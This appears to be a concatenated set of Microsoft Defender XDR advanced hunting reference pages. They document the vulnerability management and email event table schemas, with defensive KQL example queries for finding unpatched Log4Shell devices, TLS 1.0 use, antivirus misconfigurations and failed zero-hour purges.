-The `DeviceTvmInfoGathering` table in the advanced hunting schema contains [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management) assessment events including the status of various configurations and attack surface area states of devices. You can use this table to hunt for assessment events related to mitigation for zero-days, posture assessment for emerging threats supporting threat analytics mitigation status reports, enabled TLS protocol versions on servers, and more. Use this reference to construct queries that return information from the table.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the record was generated |
-| `LastSeenTime` | `datetime` | Date and time when the service last saw the device |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 10 and Windows 7. |
-| `AdditionalFields` | `dynamic` | Additional information about the entity or event |
-
-For example, to view devices affected by the [Log4Shell vulnerability](https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/) where the workaround mitigation hasn't been applied yet, or has been applied and is pending reboot, you can use the following query.
-
-```kusto
-DeviceTvmInfoGathering
-| where AdditionalFields.Log4JEnvironmentVariableMitigation in ("RebootRequired", "false")
-| join kind=inner (
- DeviceTvmSoftwareVulnerabilities
- | where CveId == "CVE-2021-44228"
-) on DeviceId
-| summarize any(DeviceName), any(AdditionalFields.Log4JEnvironmentVariableMitigation) by DeviceId
-```
-
-## Related topics
-- [DeviceTvmInfoGatheringKB](advanced-hunting-devicetvminfogatheringkb-table.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)-- [Learn how to manage the Log4Shell vulnerability in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/tvm-manage-log4shell-guidance)
security Advanced Hunting Devicetvminfogatheringkb Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvminfogatheringkb-table.md
- Title: DeviceTvmInfoGatheringKB table in the advanced hunting schema
-description: Learn about the metadata for assessment events in the DeviceTvmInfoGathering table of the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmInfoGatheringKB
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The `DeviceTvmInfoGatheringKB` table in the advanced hunting schema contains metadata for [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management) assessment events data collected in the `DeviceTvmInfoGathering` table. The `DeviceTvmInfoGatheringKB` table contains the list of various configuration and attack surface area assessments used by Defender Vulnerability Management information gathering to assess devices. Use this reference to construct queries that return information from the table.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `IgId` | `string` | Unique identifier for the piece of information gathered |
-| `FieldName` | `string` | Name of the field where this information appears in the AdditionalFields column of the DeviceTvmInfoGathering table |
-| `Description` | `string` | Description of the information gathered |
-| `Categories` | `dynamic` | List of categories that the information belongs to, in JSON array format |
-| `DataStructure` | `string` | The data structure of the information gathered |
-
-You can use this table to explore the kinds of information available in `DeviceTvmInfoGathering` so you can later fine-tune your hunting query.
-
-For instance, to see the list of information being collected, you can try the following query:
-
-```kusto
-// Check out what is being collected
-DeviceTvmInfoGatheringKB
-```
-
-From the results, say you become interested in the available categories, you can use the following query:
-
-```kusto
-// Return all available categories
-DeviceTvmInfoGatheringKB
-| mv-expand Categories to typeof(string)
-| distinct Categories
-```
-
-Then, let's say you want to see the assessment categories involving the TLS protocol:
-
-```kusto
-// Return all findings for a specified category
-DeviceTvmInfoGatheringKB
-| where Categories contains "tls"
-```
-
-Using the resulting fields, you can then use the `DeviceTvmInfoGathering` table to get a list of devices using TLS client version 1.0.
-
-```kusto
-// Return all devices on which the TLS version 1.0 is enabled
-DeviceTvmInfoGathering
-| where AdditionalFields.TlsClient10 == "Enabled" or AdditionalFields.TlsServer10 == "Enabled"
-```
-
-## Related topics
--- [DeviceTvmInfoGathering](advanced-hunting-devicetvminfogathering-table.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Devicetvmsecureconfigurationassessment Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmsecureconfigurationassessment-table.md
- Title: DeviceTvmSecureConfigurationAssessment table in the advanced hunting schema
-description: Learn about security assessment events in the DeviceTvmSecureConfigurationAssessment table of the advanced hunting schema. These events provide device information, security configuration details, impact, and compliance information.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmSecureConfigurationAssessment
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-Each row in the `DeviceTvmSecureConfigurationAssessment` table contains an assessment event for a specific security configuration from [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt). Use this reference to check the latest assessment results and determine whether devices are compliant.
-
-You can join this table with the [DeviceTvmSecureConfigurationAssessmentKB](advanced-hunting-devicetvmsecureconfigurationassessmentkb-table.md) table using `ConfigurationId` so you can, for example, view the text description of the configuration from the `ConfigurationDescription` column of the `DeviceTvmSecureConfigurationAssessmentKB` table, in the configuration assessment results.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. Indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10, and Windows 7.|
-| `Timestamp` | `datetime` | Date and time when the record was generated |
-| `ConfigurationId` | `string` | Unique identifier for a specific configuration |
-| `ConfigurationCategory` | `string` | Category or grouping to which the configuration belongs: Application, OS, Network, Accounts, Security controls |
-| `ConfigurationSubcategory` | `string` | Subcategory or subgrouping to which the configuration belongs. In many cases, string describes specific capabilities or features. |
-| `ConfigurationImpact` | `real` | Rated impact of the configuration to the overall configuration score (1-10) |
-| `IsCompliant` | `boolean` | Indicates whether the configuration or policy is properly configured |
-| `IsApplicable` | `boolean` | Indicates whether the configuration or policy applies to the device |
-| `Context` | `dynamic` | Additional contextual information about the configuration or policy |
-| `IsExpectedUserImpact` | `boolean` | Indicates whether there will be user impact if the configuration or policy is applied |
-
-You can try this example query to return information on devices with non-compliant antivirus configurations along with the relevant configuration metadata from the `DeviceTvmSecureConfigurationAssessmentKB` table:
-
-```kusto
-// Get information on devices with antivirus configurations issues
-DeviceTvmSecureConfigurationAssessment
-| where ConfigurationSubcategory == 'Antivirus' and IsApplicable == 1 and IsCompliant == 0
-| join kind=leftouter (
- DeviceTvmSecureConfigurationAssessmentKB
- | project ConfigurationId, ConfigurationName, ConfigurationDescription, RiskDescription, Tags, ConfigurationImpact
-) on ConfigurationId
-| project DeviceName, OSPlatform, ConfigurationId, ConfigurationName, ConfigurationCategory, ConfigurationSubcategory, ConfigurationDescription, RiskDescription, ConfigurationImpact, Tags
-```
-
-## Related topics
--- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Devicetvmsecureconfigurationassessmentkb Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmsecureconfigurationassessmentkb-table.md
- Title: DeviceTvmSecureConfigurationAssessmentKB table in the advanced hunting schema
-description: Learn about the various secure configurations assessed by Microsoft Defender Vulnerability Management in the DeviceTvmSecureConfigurationAssessmentKB table of the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmSecureConfigurationAssessmentKB
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The `DeviceTvmSecureConfigurationAssessmentKB` table in the advanced hunting schema contains information about the various secure configurations checked by [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt). It also includes risk information, related industry benchmarks, and applicable MITRE ATT&CK techniques and tactics.
-
-This table doesn't return events or records. We recommend joining this table to the [DeviceTvmSecureConfigurationAssessment](advanced-hunting-devicetvmsecureconfigurationassessment-table.md) table using `ConfigurationId` to view text information about the security configurations in the returned assessments.
-
-For example, when you query the `DeviceTvmSecureConfigurationAssessment` table you might want to view the `ConfigurationDescription` for the security configurations that come up in the assessment results. You can see this information by joining this table to `DeviceTvmSecureConfigurationAssessment` using `ConfigurationId` and project `ConfigurationDescription`.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `ConfigurationId` | `string` | Unique identifier for a specific configuration |
-| `ConfigurationImpact` | `real` | Rated impact of the configuration to the overall configuration score (1-10) |
-| `ConfigurationName` | `string` | Display name of the configuration |
-| `ConfigurationDescription` | `string` | Description of the configuration |
-| `RiskDescription` | `string` | Description of the associated risk |
-| `ConfigurationCategory` | `string` | Category or grouping to which the configuration belongs: Application, OS, Network, Accounts, Security controls|
-| `ConfigurationSubcategory` | `string` |Subcategory or subgrouping to which the configuration belongs. In many cases, this describes specific capabilities or features. |
-| `ConfigurationBenchmarks` | `dynamic` | List of industry benchmarks recommending the same or similar configuration |
-| `Tags` | `dynamic` | Labels representing various attributes used to identify or categorize a security configuration |
-| `RemediationOptions` | `string` | Recommended actions to reduce or address any associated risks |
-
-You can try this example query to return relevant configuration metadata along with information on devices with non-compliant antivirus configurations from the `DeviceTvmSecureConfigurationAssessment` table:
-
-```kusto
-// Get information on devices with antivirus configurations issues
-DeviceTvmSecureConfigurationAssessment
-| where ConfigurationSubcategory == 'Antivirus' and IsApplicable == 1 and IsCompliant == 0
-| join kind=leftouter (
- DeviceTvmSecureConfigurationAssessmentKB
- | project ConfigurationId, ConfigurationName, ConfigurationDescription, RiskDescription, Tags, ConfigurationImpact
-) on ConfigurationId
-| project DeviceName, OSPlatform, ConfigurationId, ConfigurationName, ConfigurationCategory, ConfigurationSubcategory, ConfigurationDescription, RiskDescription, ConfigurationImpact, Tags
-```
-
-## Related topics
--- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Devicetvmsoftwareevidencebeta Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmsoftwareevidencebeta-table.md
- Title: DeviceTvmSoftwareEvidenceBeta table in the advanced hunting schema
-description: Learn how to use the DeviceTvmSoftwareEvidenceBeta table in the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmSoftwareEvidenceBeta
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-> [!IMPORTANT]
-> The `DeviceTvmSoftwareEvidenceBeta` table is currently in beta. Once it leaves beta, the final table name will change and column names may also change. The modifications will then likely break queries that are still using previous names. Users are advised to review and adjust their queries when this table is finalized.
-
-The `DeviceTvmSoftwareEvidenceBeta` table in the advanced hunting schema contains data from [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt) related to the [software evidence section](/microsoft-365/security/defender-endpoint/tvm-software-inventory#software-evidence). This table allows you to view evidence of where a specific software was detected on a device. You can use this table, for example, to identify the file paths of specific software. Use this reference to construct queries that return information from the table.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `SoftwareVendor` | `string` | Name of the software publisher |
-| `SoftwareName` | `string` | Name of the software product |
-| `SoftwareVersion` | `string` | Version number of the software product |
-| `RegistryPaths` | `dynamic` | Registry paths where evidence indicating the existence of the software on a device was detected |
-| `DiskPaths` | `dynamic` | Disk paths where file-level evidence indicating the existence of the software on a device was detected |
-| `LastSeenTime` | `string` | Date and time when the device was last seen by this service |
-
-## Related topics
--- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)-- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicetvmsoftwareinventory Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmsoftwareinventory-table.md
- Title: DeviceTvmSoftwareInventory table in the advanced hunting schema
-description: Learn about the inventory of software in your devices in the DeviceTvmSoftwareInventory table of the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmSoftwareInventory
---
-**Applies to:**
-- Microsoft Defender XDR--
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
--
-The `DeviceTvmSoftwareInventory` table in the advanced hunting schema contains the [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt) inventory of software currently installed on devices in your network, including end of support information. You can, for instance, hunt for events involving devices that are installed with a currently vulnerable software version. Use this reference to construct queries that return information from the table.
-
-> [!NOTE]
-> The `DeviceTvmSoftwareInventory` and `DeviceTvmSoftwareVulnerabilities` tables have replaced the `DeviceTvmSoftwareInventoryVulnerabilities` table. Together, the first two tables include more columns you can use to help inform your vulnerability management activities or hunt for vulnerable devices.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10 and Windows 7. |
-| `OSVersion` | `string` | Version of the operating system running on the device |
-| `OSArchitecture` | `string` | Architecture of the operating system running on the device |
-| `SoftwareVendor` | `string` | Name of the software vendor |
-| `SoftwareName` | `string` | Name of the software product |
-| `SoftwareVersion` | `string` | Version number of the software product |
-| `EndOfSupportStatus` | `string` | Indicates the lifecycle stage of the software product relative to its specified end-of-support (EOS) or end-of-life (EOL) date |
-| `EndOfSupportDate` | `datetime` | End-of-support (EOS) or end-of-life (EOL) date of the software product |
-| `ProductCodeCpe` | `string` | The standard Common Platform Enumeration (CPE) name of the software product version or 'not available' where there's no CPE |
-
-## Related topics
--- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Devicetvmsoftwarevulnerabilities Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmsoftwarevulnerabilities-table.md
- Title: DeviceTvmSoftwareVulnerabilities table in the advanced hunting schema
-description: Learn about the software vulnerabilities found on devices and the list of available security updates that address each vulnerability in the DeviceTvmSoftwareVulnerabilities table of the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmSoftwareVulnerabilities
---
-**Applies to:**
-- Microsoft Defender XDR--
-> [!IMPORTANT]
-> Some information relates to pre-released product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-The `DeviceTvmSoftwareVulnerabilities` table in the advanced hunting schema contains the [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt) list of vulnerabilities in installed software products. This table also includes operating system information, CVE IDs, and vulnerability severity information. You can use this table, for example, to hunt for events involving devices that have severe vulnerabilities in their software. Use this reference to construct queries that return information from the table.
-
-> [!NOTE]
-> The `DeviceTvmSoftwareInventory` and `DeviceTvmSoftwareVulnerabilities` tables have replaced the `DeviceTvmSoftwareInventoryVulnerabilities` table. Together, the first two tables include more columns you can use to help inform your vulnerability management activities or hunt for vulnerable devices.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. Indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10, and Windows 7. |
-| `OSVersion` | `string` | Version of the operating system running on the device |
-| `OSArchitecture` | `string` | Architecture of the operating system running on the device |
-| `SoftwareVendor` | `string` | Name of the software publisher |
-| `SoftwareName` | `string` | Name of the software product |
-| `SoftwareVersion` | `string` | Version number of the software product |
-| `CveId` | `string` | Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system |
-| `VulnerabilitySeverityLevel` | `string` | Severity level assigned to the security vulnerability based on the CVSS score and dynamic factors influenced by the threat landscape |
-| `RecommendedSecurityUpdate` | `string` | Name or description of the security update provided by the software publisher to address the vulnerability |
-| `RecommendedSecurityUpdateId` | `string` | Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles |
-| `CveTags` | `dynamic` | Array of tags relevant to the CVE; example: ZeroDay, NoSecurityUpdate |
--
-## Related topics
--- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Devicetvmsoftwarevulnerabilitieskb Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicetvmsoftwarevulnerabilitieskb-table.md
- Title: DeviceTvmSoftwareVulnerabilitiesKB table in the advanced hunting schema
-description: Learn about the software vulnerabilities tracked by Microsoft Defender Vulnerability Management in the DeviceTvmSoftwareVulnerabilitiesKB table of the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceTvmSoftwareVulnerabilitiesKB
---
-**Applies to:**
-- Microsoft Defender XDR----
-The `DeviceTvmSoftwareVulnerabilitiesKB` table in the advanced hunting schema contains the list of vulnerabilities [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt) assesses devices for. Use this reference to construct queries that return information from the table.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `CveId` | `string` | Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system |
-| `CvssScore` | `string` | Severity score assigned to the security vulnerability under the Common Vulnerability Scoring System (CVSS) |
-| `IsExploitAvailable` | `boolean` | Indicates whether exploit code for the vulnerability is publicly available |
-| `VulnerabilitySeverityLevel` | `string` | Severity level assigned to the security vulnerability based on the CVSS score and dynamic factors influenced by the threat landscape |
-| `LastModifiedTime` | `datetime` | Date and time the item or related metadata was last modified |
-| `PublishedDate` | `datetime` | Date vulnerability was disclosed to the public |
-| `VulnerabilityDescription` | `string` | Description of the vulnerability and associated risks |
-| `AffectedSoftware` | `dynamic` | List of all software products affected by the vulnerability |
-
-## Related topics
--- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Overview of Microsoft Defender Vulnerability Management](/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt)
security Advanced Hunting Email Threats https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-email-threats.md
- Title: Advanced hunting example for Microsoft Defender for Office 365
-description: Get started searching for email threats using advanced hunting
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 9/13/2023--
-# Advanced hunting example for Microsoft Defender for Office 365
--
-**Applies to:**
-- Microsoft Defender XDR-
-Want to get started searching for email threats using advanced hunting? Try these steps:
-
-The [Microsoft Defender for Office 365 deployment guide](../office-365-security/mdo-deployment-guide.md) explains how to jump right in and get configuration going on Day 1.
-
-Depending on your [preset security policy vs. custom policy choices](../office-365-security/mdo-deployment-guide.md#determine-your-protection-policy-strategy), **Zero-Hour auto purge** (ZAP) settings are important to know if a malicious message was removed from a mailbox after delivery.
-
-Quickly navigating to Kusto query language to hunt for issues is an advantage of converging these two security centers. Security teams can monitor ZAP misses by taking their next steps in the Microsoft Defender portal at <https://security.microsoft.com> \> **Hunting** \> **Advanced Hunting**.
-
-1. On the **Advanced Hunting page** at <https://security.microsoft.com/v2/advanced-hunting>, verify the **New Query** tab is selected.
-1. Copy the following query into the **Query** box:
-
- ```kusto
- EmailPostDeliveryEvents
- | where Timestamp > ago(7d)
- //List malicious emails that were not zapped successfully
- | where ActionType has "ZAP" and ActionResult == "Error"
- | project ZapTime = Timestamp, ActionType, NetworkMessageId , RecipientEmailAddress
- //Get logon activity of recipients using RecipientEmailAddress and AccountUpn
- | join kind=inner IdentityLogonEvents on $left.RecipientEmailAddress == $right.AccountUpn
- | where Timestamp between ((ZapTime-24h) .. (ZapTime+24h))
- //Show only pertinent info, such as account name, the app or service, protocol, the target device, and type of logon
- | project ZapTime, ActionType, NetworkMessageId , RecipientEmailAddress, AccountUpn,
- LogonTime = Timestamp, AccountDisplayName, Application, Protocol, DeviceName, LogonType
- ```
-
-1. Select **Run query**.
--
-The data from this query appears in the **Results** panel below the query itself. Results include information like `DeviceName`, `AccountDisplayName`, and `ZapTime` in a customizable result set. Results can also be exported for your records. To save the query for reuse, select **Save** \> **Save As** to add the query to your list of queries, shared, or community queries.
-
-## Related information
--- [Advanced hunting best practices](advanced-hunting-best-practices.md)-- [Overview - Advanced hunting](advanced-hunting-overview.md)
security Advanced Hunting Emailattachmentinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-emailattachmentinfo-table.md
- Title: EmailAttachmentInfo table in the advanced hunting schema
-description: Learn about email attachment information in the EmailAttachmentInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 12/29/2023--
-# EmailAttachmentInfo
--
-**Applies to:**
--- Microsoft Defender XDR--
-The `EmailAttachmentInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about attachments on emails processed by Microsoft Defender for Office 365. Use this reference to construct queries that return information from this table.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `NetworkMessageId` | `string` | Unique identifier for the email, generated by Microsoft 365 |
-| `SenderFromAddress` | `string` | Sender email address in the FROM header, which is visible to email recipients on their email clients |
-| `SenderDisplayName` | `string` | Name of the sender displayed in the address book, typically a combination of a given or first name, a middle initial, and a last name or surname |
-| `SenderObjectId` | `string` | Unique identifier for the sender's account in Microsoft Entra ID |
-| `RecipientEmailAddress` | `string` | Email address of the recipient, or email address of the recipient after distribution list expansion |
-| `RecipientObjectId` | `string` | Unique identifier for the email recipient in Microsoft Entra ID |
-| `FileName` | `string` | Name of the file that the recorded action was applied to |
-| `FileType` | `string` | File extension type |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `FileSize` | `long` | Size of the file in bytes |
-| `ThreatTypes` | `string` | Verdict from the email filtering stack on whether the email contains malware, phishing, or other threats |
-| `ThreatNames` | `string` | Detection name for malware or other threats found |
-| `DetectionMethods` | `string` | Methods used to detect malware, phishing, or other threats found in the email |
-| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
--
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Emailevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-emailevents-table.md
- Title: EmailEvents table in the advanced hunting schema
-description: Learn about events associated with Microsoft 365 emails in the EmailEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# EmailEvents
--
-**Applies to:**
--- Microsoft Defender XDR--
-The `EmailEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about events involving the processing of emails on Microsoft Defender for Office 365. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `NetworkMessageId` | `string` | Unique identifier for the email, generated by Microsoft 365 |
-| `InternetMessageId` | `string` | Public-facing identifier for the email that is set by the sending email system |
-| `SenderMailFromAddress` | `string` | Sender email address in the MAIL FROM header, also known as the envelope sender or the Return-Path address |
-| `SenderFromAddress` | `string` | Sender email address in the FROM header, which is visible to email recipients on their email clients |
-| `SenderDisplayName` | `string` | Name of the sender displayed in the address book, typically a combination of a given or first name, a middle initial, and a last name or surname |
-| `SenderObjectId` | `string` |Unique identifier for the sender's account in Microsoft Entra ID |
-| `SenderMailFromDomain` | `string` | Sender domain in the MAIL FROM header, also known as the envelope sender or the Return-Path address |
-| `SenderFromDomain` | `string` | Sender domain in the FROM header, which is visible to email recipients on their email clients |
-| `SenderIPv4` | `string` | IPv4 address of the last detected mail server that relayed the message |
-| `SenderIPv6` | `string` | IPv6 address of the last detected mail server that relayed the message |
-| `RecipientEmailAddress` | `string` | Email address of the recipient, or email address of the recipient after distribution list expansion |
-| `RecipientObjectId` | `string` | Unique identifier for the email recipient in Microsoft Entra ID |
-| `Subject` | `string` | Subject of the email |
-| `EmailClusterId` | `long` | Identifier for the group of similar emails clustered based on heuristic analysis of their contents |
-| `EmailDirection` | `string` | Direction of the email relative to your network: Inbound, Outbound, Intra-org |
-| `DeliveryAction` | `string` | Delivery action of the email: Delivered, Junked, Blocked, or Replaced |
-| `DeliveryLocation` | `string` | Location where the email was delivered: Inbox/Folder, On-premises/External, Junk, Quarantine, Failed, Dropped, Deleted items |
-| `ThreatTypes` | `string` | Verdict from the email filtering stack on whether the email contains malware, phishing, or other threats |
-| `ThreatNames` | `string` |Detection name for malware or other threats found |
-| `DetectionMethods` | `string` | Methods used to detect malware, phishing, or other threats found in the email |
-| `ConfidenceLevel` | `string` | List of confidence levels of any spam or phishing verdicts. For spam, this column shows the spam confidence level (SCL), indicating if the email was skipped (-1), found to be not spam (0,1), found to be spam with moderate confidence (5,6), or found to be spam with high confidence (9). For phishing, this column displays whether the confidence level is "High" or "Low". |
